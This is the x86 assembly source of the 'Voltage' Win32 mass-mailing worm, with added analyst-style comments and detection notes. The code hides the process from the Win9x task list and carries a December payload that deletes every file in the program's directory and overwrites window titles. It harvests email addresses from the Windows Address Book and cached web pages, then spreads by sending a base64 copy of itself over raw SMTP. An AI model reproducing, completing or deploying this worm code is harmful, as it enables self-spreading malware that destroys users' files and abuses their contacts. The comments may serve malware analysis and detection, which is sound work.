📄 i-worm_win32.voltage病毒源代码.txt
EndRarHeader:
RarHeaderSize equ ($-RarHeader) 


;(c) z0mbie/29a crc32 function -- bitwise (table-free) CRC-32, reflected form
; input:  EDX=data, ECX=size, EAX=crc (running value; a caller chaining blocks passes the previous result)
; output: EAX=crc, EDX+=ECX, ECX=BL=0
; clobbers: flags only; no stack or memory writes
; size 0: returns at once with EAX untouched (no inversion is applied)
xcrc32: jecxz  @@crc_done                ; nothing to fold -> leave EAX as it is
not   eax                                ; standard pre-inversion of the running crc
@@crc_byte: xor   al, [edx]              ; fold the next data byte into the low crc byte
inc   edx                                ; EDX walks forward; ends at data+size
mov   bl, 8                              ; eight shift/xor rounds per byte
@@crc_bit: shr   eax, 1                  ; CF = bit shifted out
jnc   @@crc_keep
xor   eax, 0EDB88320h                    ; reflected polynomial 0x04C11DB7
@@crc_keep: dec   bl                     ; BL counts the rounds down to 0
jnz   @@crc_bit
dec   ecx                                ; ECX = bytes remaining; reaches 0 on exit
jnz   @@crc_byte
not   eax                                ; final inversion
@@crc_done: ret



;-----------------------------------------------------------------------
; HideVirus - hide the running process from the Win9x Ctrl+Alt+Del task list
; Resolves RegisterServiceProcess from kernel32 by name at run time and,
; if present, calls RegisterServiceProcess(0, 1): process id 0 means the
; calling process, type 1 registers it as a "service" process. The export
; exists only on Win9x kernels; where GetProcAddress returns 0 the routine
; silently does nothing.
; In:    ebp = delta base; [ebp+kernel32base] and [ebp+__GetProcAddress] set
; Out:   eax = result of RegisterServiceProcess, or 0 when the API is absent
; Clobb: eax, flags (both callees are presumably stdcall and pop their args)
; Detection note: a non-service executable resolving the string
; "RegisterServiceProcess" is a classic Win9x process-hiding indicator.
;-----------------------------------------------------------------------
HideVirus: ;hide virus process from alt+crtl+del menu
lea eax,[ebp + RSP]
push eax                                 ; lpProcName = "RegisterServiceProcess"
push dword ptr [ebp + kernel32base]      ; hModule = kernel32
call [ebp + __GetProcAddress]
cmp eax,0h
je ExitRSP                               ; export not found (NT family): do nothing
push 1                                   ; dwType = 1 (register as service)
push 0                                   ; dwProcessId = 0 (current process)
call eax                                 ; RegisterServiceProcess(0, 1)
ExitRSP:ret

RSP db "RegisterServiceProcess",0         ; looked up by name; never appears in the import table



;-----------------------------------------------------------------------
; PayLoad - date-triggered payload, keyed off GetLocalTime()
;  wMonth == 0Ch (December) is required for anything below; otherwise exit.
;  wDay == 1Eh (30th): loops hwnd = 0FFFFh down to 1 calling
;     SetWindowText(hwnd, CopyRight) -- brute-forces every small handle
;     value -- then shows CopyRight in a system-modal MessageBox and
;     falls through into Payload2 (whose wDay test then fails).
;  wDay == 1Dh (29th): SetCurrentDirectory(FileDirectory), then
;     FindFirstFile("*.*") / DeleteFile / FindNextFile over every entry.
;     Destructive: every deletable file in that directory is removed.
;     The IF DEBUG MessageBox prompts are compiled out of a release
;     build, so there deletion runs unattended.
; In:    ebp = delta base; API slots, SYSTEMTIME (wMonth/wDay presumably
;        its members) and the WIN32_FIND_DATA buffer below are ebp-relative
; Out:   nothing useful; eax, ecx and flags clobbered
; Uses:  hfind (search handle), cFileName (member of WIN32_FIND_DATA)
; Analysis note: the trigger is the local clock, so a sandbox must run
; with the date set to Dec 29 / Dec 30 to observe either branch; the
; "*.*" DeleteFile loop in the program's own directory is the behaviour
; to watch for.
;-----------------------------------------------------------------------
PayLoad:
lea eax,[ebp + SYSTEMTIME]
push eax
call [ebp + GetLocalTime]                ; fills SYSTEMTIME with the local date/time
cmp word ptr [ebp + wMonth],0ch          ; December only
jne ExitPayload
cmp word ptr [ebp + wDay],1eh            ; 30th -> window-title / message-box branch
jne Payload2
;replace all windows title with copyright message
mov ecx,0ffffh                           ; ecx is both the loop counter and the hwnd guess
payl0ad:push ecx                         ; preserve the counter across the API call
lea eax,[ebp + CopyRight]
push eax                                 ; lpString = CopyRight
push ecx                                 ; hWnd = counter value (no validity check)
call [ebp + SetWindowText]
pop ecx
loop payl0ad                             ; 0FFFFh iterations, down to hwnd 1
;show payload message box:
push MB_SYSTEMMODAL or MB_ICONINFORMATION
lea eax,[ebp + CopyRight]
push eax                                 ; lpCaption
push eax                                 ; lpText (same string)
push 0h                                  ; hWnd = NULL
call [ebp + MessageBox]
Payload2:                                ; also reached by fall-through from the 30th branch
;destructive branch: delete every file in the program directory
cmp word ptr [ebp + wDay],1dh            ; 29th only
jne ExitPayload
lea eax,[ebp + FileDirectory]
push eax
call [ebp + SetCurrentDirectory] ;goto running program directory
lea eax,[ebp + WIN32_FIND_DATA]
push eax                                 ; lpFindFileData = buffer declared below
lea eax,[ebp + search_mask]
push eax                                 ; lpFileName = "*.*"
call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je ExitPayload                           ; nothing matched / directory inaccessible
mov [ebp + hfind],eax ;save search handle
@Love:                                   ; per-entry loop; cFileName was filled by Find*File
IF DEBUG                                 ; debug build: ask before each delete
push MB_YESNO
lea eax,[ebp + warning2]
push eax
lea eax,[ebp + cFileName]
push eax
push 0h
call [ebp + MessageBox]
cmp eax,IDYES
jne SkipFile
ENDIF
lea eax,[ebp + cFileName]
push eax
call [ebp + DeleteFile]                  ; unconditional in a release build
SkipFile:
IF DEBUG                                 ; debug build: offer to stop the loop
push MB_YESNO
lea eax,[ebp + StopPayload]
push eax
lea eax,[ebp + cFileName]
push eax
push 0h
call [ebp + MessageBox]
cmp eax,IDYES
je ExitPayload
ENDIF
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
cmp eax,0h
jne @Love                                ; more entries -> continue; 0 = enumeration done (handle not closed here)
ExitPayload:
ret

MB_SYSTEMMODAL equ 00001000h             ; MessageBox style flags used by PayLoad
MB_ICONINFORMATION equ 00000040h

IF DEBUG                                 ; prompt strings exist only in debug builds
warning2 db "Voltage Virus is going to delete this file :",0
StopPayload db "Stop Payload ?",0
ENDIF

hfind dd 0                               ; search handle stored by PayLoad (no FindClose visible in this chunk)
search_mask db "*.*",0                   ; every entry of the current directory


; Inline WIN32_FIND_DATAA buffer filled by FindFirstFile/FindNextFile in
; PayLoad; cFileName is the member PayLoad hands to DeleteFile.
; NOTE(review): the SDK struct reserves MAX_PATH (260) bytes for cFileName;
; this layout reserves 0FFh (255), i.e. 5 bytes short, so the API may
; write past cAlternateFileName into whatever the assembler places next.
WIN32_FIND_DATA:
dwFileAttributes dd 0
ftCreationTime dq 0                      ; FILETIME
ftLastAccessTime dq 0                    ; FILETIME
ftLastWriteTime dq 0                     ; FILETIME
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd   0
dwReserved1 dd   0
cFileName db   0ffh dup (0)              ; name of the entry just found
cAlternateFileName db 14 dup (0)         ; 8.3 short name



;-----------------------------------------------------------------------
; GetADVAPI32Apis - resolve the registry APIs the worm uses
; LoadLibrary("ADVAPI32.DLL"), then hands the module handle, the count and
; the two parallel tables below to get_apis (defined elsewhere), which
; presumably fills reg_function_addresses from the names in reg_functions_sz.
; In:    ebp = delta base
; Out:   RegOpenKeyEx / RegSetValueEx / RegCloseKey / RegQueryValueEx slots
;        filled by get_apis; the LoadLibrary result is passed on unchecked
; Regs handed to get_apis: edx = hModule, ecx = NumberOfRegFunctions,
;        eax -> name table, ebx -> address table
; Clobb: eax, ebx, ecx, edx, flags (plus whatever get_apis clobbers)
; Detection note: registry access goes through these run-time-resolved
; pointers, so none of the names appear in the binary's import table.
;-----------------------------------------------------------------------
GetADVAPI32Apis:
lea eax,[ebp + ADVAPI32dll]
push eax
call [ebp + LoadLibrary]
xchg eax,edx                             ; edx = hModule; eax is reused below
mov ecx,NumberOfRegFunctions
lea eax,[ebp + reg_functions_sz]         ; NUL-terminated names, back to back
lea ebx,[ebp + reg_function_addresses]   ; dd slots in the same order
call get_apis
ret

ADVAPI32dll db "ADVAPI32.DLL",0          ; LoadLibrary name used by GetADVAPI32Apis

; Name table for get_apis: four NUL-terminated ANSI export names, in the
; same order as the dd slots under reg_function_addresses.
reg_functions_sz:

_RegOpenKeyExA db "RegOpenKeyExA",0
_RegSetValueExA db "RegSetValueExA",0
_RegCloseKey db "RegCloseKey",0
_RegQueryValueEx db "RegQueryValueExA",0 ; label has no A suffix, the exported name does

; Address table: filled at run time; code calls through [ebp + RegXxx].
reg_function_addresses:

RegOpenKeyEx dd 0
RegSetValueEx dd 0
RegCloseKey dd 0
RegQueryValueEx dd 0

NumberOfRegFunctions equ 4               ; must equal the entry count of both tables



;-----------------------------------------------------------------------
; MassMail - SMTP mass-mailing routine
; Speaks raw SMTP (HELO / MAIL FROM / RCPT TO / DATA / QUIT) to the server
; that GetSMTPServer obtains from the registry. Recipients come from two
; arrays built earlier in this routine: ScanWAB fills hMailAddresses /
; NumberOfMailAddresses, SearchEmailsInHTMFiles fills MailsMemory /
; NumberOfEmails. One of five message templates is picked by MessageNumber
; and the base64 image from CreateVirusBase64Image is sent as the body.
; No SMTP AUTH is attempted anywhere below.
; In:    ebp = delta base; all API slots and buffers addressed ebp-relative
; Out:   nothing; every register is restored by popad
; Stack: pushad + a 2-dword SEH registration record, unlinked at ExitMM
; Error handling: CF=0 from a Check*/Get*/Allow*/Create*/Connect* helper
;   means "stop"; socket failures jump to Disconnect; the labels from
;   Disconnect down to ExitMM form a fall-through cleanup ladder, each
;   entry point releasing one resource more than the one below it.
; Detection notes (responders): an outbound SMTP session from a process
;   that is not a mail client, a HELO followed by many RCPT TO lines and a
;   single DATA with a base64 attachment, plus the 220/250/354 reply
;   checks below, are the network fingerprint; the mutex named by the
;   CopyRight string (AllowOnlyOneRun) is the host-side one.
;-----------------------------------------------------------------------
MassMail:
;send the virus to all email addresses that the virus
;found in the Windows address book file and temporary
;internet files
pushad ;set SEH: save every register, then link MM_SEH_Handler into fs:[0]
lea eax,[ebp + MM_SEH_Handler]
push eax                                 ; EXCEPTION_REGISTRATION.handler
xor eax,eax
push dword ptr fs:[eax]                  ; EXCEPTION_REGISTRATION.prev = old head
mov fs:[eax],esp                         ; install; esp is now the registration record
call CheckConditions ;check for some conditions before sending mails (CF=0 -> abort)
jnc ExitMM
call AllowOnlyOneRun ;use mutex to alow only one execute of the mail
jnc ExitMM ;worm
call GetWinsockApis ;get all needed apis from winsock library 
jnc ExitMM
call GetSMTPServer ;get the default smtp server from the registry
jnc FreeWSLibraryAndExit
call CreateVirusBase64Image ;base64 encode of infected file
jnc FreeWSLibraryAndExit
call ScanWAB ;get email addresses from the windows address book
call SearchEmailsInHTMFiles ;and also from temporary internet files
call ConnectToServer ;connect to server
jnc FreeBase64Mem
call [ebp + GetTickCount]
mov [ebp + MessageNumber],al ;select random message: low byte of the tick count, bucketed at 32h/64h/96h/0c8h below
call __recv ;recv server message: the greeting
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h                               ; 0 = peer closed the connection
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 022" ;is 220 ? (4-char literal is stored reversed, so this matches "220 " in memory)
jne Disconnect
;send HELO command:
push 0h                                  ; send() flags
push SizeOfHELO
lea eax,[ebp + HELO]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
call __recv ;get server message
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 052" ;is 250 ?
jne Disconnect
;send the mail from command:
push 0h                                  ; send() flags, pushed first for all five variants
cmp byte ptr [ebp + MessageNumber],32h   ; 0..50   -> template 1
ja mfrom
push SizeOfMailFrom1
lea eax,[ebp + MAILFROM1]
push eax
jmp mfromok
mfrom: cmp byte ptr [ebp + MessageNumber],64h ; 51..100 -> template 2
ja mfrom2
push SizeOfMailFrom2
lea eax,[ebp + MAILFROM2]
push eax
jmp mfromok
mfrom2: cmp byte ptr [ebp + MessageNumber],96h ; 101..150 -> template 3
ja mfrom3
push SizeOfMailFrom3
lea eax,[ebp + MAILFROM3]
push eax
jmp mfromok
mfrom3: cmp byte ptr [ebp + MessageNumber],0c8h ; 151..200 -> template 4
ja mfrom4
push SizeOfMailFrom4
lea eax,[ebp + MAILFROM4]
push eax
jmp mfromok
mfrom4: push SizeOfMailFrom5             ; 201..255 -> template 5
lea eax,[ebp + MAILFROM5]
push eax
mfromok:push dword ptr [ebp + vsocket]   ; common tail: send(vsocket, buf, len, 0)
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
call __recv ;get server message:
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 052" ;is 250 ?
jne Disconnect
;send RCPT command
xor ecx,ecx
mov esi,[ebp + hMailAddresses]           ; esi -> packed NUL-terminated addresses from the WAB
mov cx,[ebp + NumberOfMailAddresses]
cmp ecx,1h
jbe MailsFromFiles                       ; WAB list is only used when it holds more than one entry
@NxtAdd:push ecx                         ; ecx = outer counter (entries remaining), saved across the calls
push 0h
push SizeOfRcpt
lea edx,[ebp + RCPT]
push edx
push dword ptr [ebp + vsocket]
call [ebp + send] ;send start of RCPT command
push esi                                 ; keep the start of the current address
xor ecx,ecx
AddSize:inc ecx ;get email address size (ecx = byte count up to the NUL)
inc esi
cmp byte ptr [esi],0h
jne AddSize 
pop esi ;pointer to email addresses array
push 0h
push ecx                                 ; len = address length
push esi                                 ; buf = address
add esi,ecx ;move to next address
inc esi                                  ; step over the terminating NUL
push dword ptr [ebp + vsocket]
call [ebp + send] ;send address
push 0h
push SizeOfEndRcpt
lea eax,[ebp + EndOfRCPT]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send] ;send the end or rcpt command
call __recv ;get server message (reply not inspected)
pop ecx
loop @NxtAdd ;and move to next mail address
MailsFromFiles: ;send mails to ppl that we found in temporary internet files
cmp word ptr [ebp + NumberOfEmails],28h
jb _1___ ;is number of mails > 40 ? (below 40: keep the count as found)
mov [ebp + NumberOfEmails],1eh ;send 30 emails (40 or more is capped at 30)
_1___: xor ecx,ecx
mov cx,[ebp + NumberOfEmails] ;number of mails
mov esi,[ebp + MailsMemory] ;pointer to mails array (same packed layout as above)
@nM: push ecx ;next mail
push 0h
push SizeOfRcpt
lea edx,[ebp + RCPT]
push edx
push dword ptr [ebp + vsocket]
call [ebp + send] ;send start of RCPT command
xor ecx,ecx
push esi
Csize: inc ecx
inc esi
cmp byte ptr [esi],0h
jne Csize ;calc mail address size
pop esi ;restore pointer to mail address
push 0h
push ecx
push esi
add esi,ecx
inc esi ;move to next email
push dword ptr [ebp + vsocket]
call [ebp + send]
push 0h
push SizeOfEndRcpt
lea eax,[ebp + EndOfRCPT]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
call __recv                              ; reply not inspected
pop ecx
loop @nM
;send data command
push 0h
push SizeOfData
lea eax,[ebp + __DATA]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
;get server message
call __recv
cmp eax,SOCKET_ERR
je Disconnect
cmp eax,0h
je Disconnect
lea eax,[ebp + GetBuffer]
cmp dword ptr [eax]," 453" ;is 354 ? (start mail input)
jne Disconnect
;send from and subject (same five buckets as MAIL FROM, so headers match the envelope)
push 0h
cmp byte ptr [ebp + MessageNumber],32h
ja _fs
push SizeOfFromAndSubject1
lea eax,[ebp + FromAndSubject1]
push eax
jmp smimeh 
_fs: cmp byte ptr [ebp + MessageNumber],64h
ja _fs2
push SizeOfFromAndSubject2
lea eax,[ebp + FromAndSubject2]
push eax
jmp smimeh 
_fs2: cmp byte ptr [ebp + MessageNumber],96h
ja _fs3
push SizeOfFromAndSubject3
lea eax,[ebp + FromAndSubject3]
push eax
jmp smimeh
_fs3: cmp byte ptr [ebp + MessageNumber],0c8h
ja _fs4
push SizeOfFromAndSubject4
lea eax,[ebp + FromAndSubject4]
push eax
jmp smimeh
_fs4: push SizeOfFromAndSubject5
lea eax,[ebp + FromAndSubject5]
push eax
smimeh: push dword ptr [ebp + vsocket]
call [ebp + send]
;send the mime header
push 0h
push SizeOfMessageMimeHeader
lea eax,[ebp + MessageMimeHeader]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
cmp eax,SOCKET_ERR
je Disconnect
;send message and attachment name (third bucket ladder, same thresholds)
push 0h
cmp byte ptr [ebp + MessageNumber],32h
ja _ma
push SizeOfMessageAndFileName1
lea eax,[ebp + MessageAndFileName1]
push eax
jmp sattch 
_ma: cmp byte ptr [ebp + MessageNumber],64h
ja _ma2
push SizeOfMessageAndFileName2
lea eax,[ebp + MessageAndFileName2]
push eax
jmp sattch
_ma2: cmp byte ptr [ebp + MessageNumber],96h
ja _ma3
push SizeOfMessageAndFileName3
lea eax,[ebp + MessageAndFileName3]
push eax
jmp sattch
_ma3: cmp byte ptr [ebp + MessageNumber],0c8h
ja _ma4
push SizeOfMessageAndFileName4
lea eax,[ebp + MessageAndFileName4]
push eax
jmp sattch
_ma4: push SizeOfMessageAndFileName5
lea eax,[ebp + MessageAndFileName5]
push eax
sattch: push dword ptr [ebp + vsocket]
call [ebp + send]
;send the attachment
mov ecx,[ebp + sizeofbase64out]          ; length of the base64 image
mov eax,[ebp + base64outputmem]          ; buffer produced by CreateVirusBase64Image
push 0h
push ecx
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
;send end of mail
push 0h
push SizeOfEndOfMail
lea eax,[ebp + EndOfMail]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
;get server message
call __recv
;send quit command
QuitM: push 0h
push SizeOfQuit
lea eax,[ebp + QUIT]
push eax
push dword ptr [ebp + vsocket]
call [ebp + send]
Disconnect:                              ; ladder entry: close socket and winsock, then fall through
push dword ptr [ebp + vsocket]
call [ebp + closesocket]
call [ebp + WSACleanup]
FreeBase64Mem:                           ; entry when ConnectToServer failed
push [ebp + base64outputmem]
call [ebp + GlobalFree]
FreeWSLibraryAndExit:                    ; entry when GetSMTPServer / CreateVirusBase64Image failed
push dword ptr [ebp + hWinsock]
call [ebp + FreeLibrary]
FreeWabMemAndExit:                       ; both address arrays are freed on every path through here,
push dword ptr [ebp + hMailAddresses]    ;   including ones on which ScanWAB never ran (values are then whatever the slots hold)
call [ebp + GlobalFree]
push dword ptr [ebp + MailsMemory]
call [ebp + GlobalFree]
ExitMM: pop dword ptr fs:[0]             ; unlink SEH: restore the previous handler
add esp,4h                               ; discard the handler pointer pushed at entry
popad
ret
MM_SEH_Handler:                          ; entered by the OS for any exception raised inside MassMail
mov esp,[esp + 8h]                       ; 2nd handler argument (the EstablisherFrame) = our registration record; drops the faulting frames
pop dword ptr fs:[0]                     ; unlink the handler
add esp,4h
popad                                    ; registers as saved on entry
ret                                      ; returns to MassMail's caller; the cleanup ladder is skipped, so socket, buffers and library stay allocated


MessageNumber db 0                       ; low byte of GetTickCount; selects the message template (see the 32h/64h/96h/0c8h ladders)


;-----------------------------------------------------------------------
; AllowOnlyOneRun - single-instance check through a named mutex
; The mutex name is the CopyRight string (defined elsewhere in the file).
; OpenMutex(MUTEX_ALL_ACCESS, FALSE, CopyRight): a non-zero handle means
; another instance already created it -> return CF=0.
; Otherwise CreateMutex(NULL, FALSE, CopyRight) claims it -> return CF=1.
; In:    ebp = delta base
; Out:   CF=1 proceed, CF=0 already running; eax = handle returned by the
;        last API call (neither handle is closed or stored here)
; Clobb: eax, flags
; Detection note: a mutex named after the CopyRight string is a host
; indicator; PayLoad uses the same string as window title and caption.
;-----------------------------------------------------------------------
AllowOnlyOneRun:
;use mutex to check if we already running
lea eax,[ebp + CopyRight]
push eax                                 ; lpName
push 0h                                  ; bInheritHandle = FALSE
push MUTEX_ALL_ACCESS                    ; dwDesiredAccess
call [ebp + OpenMutex]
cmp eax,0h
jne AlreadyRun                           ; handle returned -> the mutex exists
lea eax,[ebp + CopyRight]
push eax                                 ; lpName
xor eax,eax
push eax                                 ; bInitialOwner = FALSE
push eax                                 ; lpMutexAttributes = NULL
call [ebp + CreateMutex]
stc                                      ; CF=1: first instance, continue
ret
AlreadyRun:
clc                                      ; CF=0: another instance holds the mutex
ret

MUTEX_ALL_ACCESS equ 001F0001h           ; same value as the Win32 SDK constant


;-----------------------------------------------------------------------
; __recv - read one SMTP reply: recv(vsocket, GetBuffer, 0FFh, 0)
; In:    ebp = delta base; [ebp+vsocket] = connected socket
; Out:   eax = bytes received, 0 on orderly close, SOCKET_ERR on failure
;        (callers test both); the reply bytes land in GetBuffer
; Clobb: eax, flags
; Note:  nothing NUL-terminates the buffer and bytes beyond eax are left
;        over from earlier calls; callers only inspect the first 4 bytes.
;        GetBuffer is declared elsewhere -- presumably at least 0FFh bytes.
;-----------------------------------------------------------------------
__recv:
push 0h                                  ; flags
push 0ffh                                ; len = 255
lea eax,[ebp + GetBuffer]
push eax                                 ; buf
push dword ptr [ebp + vsocket]           ; s
call [ebp + recv]
ret


;scan all .htm,asp,xml temporary files for email addresses
;-----------------------------------------------------------------------
; SearchEmailsInHTMFiles - harvest addresses from the IE cache folder
; Locates Temporary Internet Files with
; SHGetSpecialFolderPathA(NULL, TempDir, CSIDL_INTERNET_CACHE, FALSE),
; makes it the current directory, allocates a 0C800h-byte (50 KB, zeroed)
; buffer for the addresses, resets the counters and calls FindFiles
; (defined elsewhere) to do the actual scanning.
; In:    ebp = delta base
; Out:   [ebp+MailsMemory] = buffer (GPTR: handle usable as pointer);
;        [ebp+LastMailPointer], [ebp+NumberOfEmails], [ebp+NewMail] zeroed;
;        no CF result -- MassMail does not check one
; Clobb: eax, ebx, ecx, flags (plus whatever FindFiles clobbers)
; Debug builds skip the shell32 lookup and chdir to a fixed test path.
; Detection note: a process resolving SHGetSpecialFolderPathA, changing
; into the IE cache folder and enumerating files there is the observable
; behaviour; the 50 KB GPTR allocation follows immediately.
;-----------------------------------------------------------------------
SearchEmailsInHTMFiles:
IF DEBUG
call SetDebugDir                         ; the call pushes the address of the string below
db "C:\w32_Voltage_V2\TempInetFiles",0   ; debug-only test directory
SetDebugDir:
call [ebp + SetCurrentDirectory]         ; consumes that pushed pointer as lpPathName
jmp ____1_                               ; skip the shell32 lookup
ENDIF
lea eax,[ebp + shell_dll]
push eax
call [ebp + LoadLibrary]                 ; "Shell32.dll"
cmp eax,0h
je ExitTMS
mov [ebp + shell_h],eax
lea ebx,[ebp + _SHGetSpecialFolderPath]
push ebx                                 ; lpProcName = "SHGetSpecialFolderPathA"
push eax                                 ; hModule
call [ebp + __GetProcAddress]
cmp eax,0h
je UnloadSh
xor ecx,ecx
push ecx                                 ; fCreate = FALSE
push CSIDL_INTERNET_CACHE ;get temporary internet files directory
lea ebx,[ebp + TempDir]
push ebx                                 ; pszPath = TempDir (declared elsewhere; presumably MAX_PATH bytes)
push ecx                                 ; hwndOwner = NULL
call eax                                 ; SHGetSpecialFolderPathA(...)
cmp eax,1h ;success ? (TRUE)
jne UnloadSh 
lea eax,[ebp + TempDir]
push eax
call [ebp + SetCurrentDirectory]         ; scanning below is relative to the cache folder
____1_: push 0c800h ;50k (51200 bytes)
push GPTR                                ; fixed, zero-initialised
call [ebp + GlobalAlloc] ;allocate 50k of memory which used to store mails
cmp eax,0h
je UnloadSh
mov [ebp + MailsMemory],eax
mov [ebp + LastMailPointer],0            ; write cursor into the buffer
mov [ebp + NumberOfEmails],0             ; count consumed by MassMail
mov [ebp + NewMail],0h
call FindFiles                           ; enumerates the current directory (body elsewhere)
UnloadSh: ;unload shell library
push dword ptr [ebp + shell_h]           ; on the debug path this was not set here
call [ebp + FreeLibrary]
ExitTMS:ret ;exit temp mails search


shell_dll db "Shell32.dll",0             ; LoadLibrary name used by SearchEmailsInHTMFiles
shell_h dd 0                             ; module handle, released at UnloadSh
_SHGetSpecialFolderPath db "SHGetSpecialFolderPathA",0 ; resolved by name at run time (not in the import table)


CSIDL_INTERNET_CACHE equ 0020h           ; Temporary Internet Files folder id (SDK value)

MailsMemory dd 0                         ; 50 KB GPTR buffer of harvested addresses; freed by MassMail's cleanup ladder
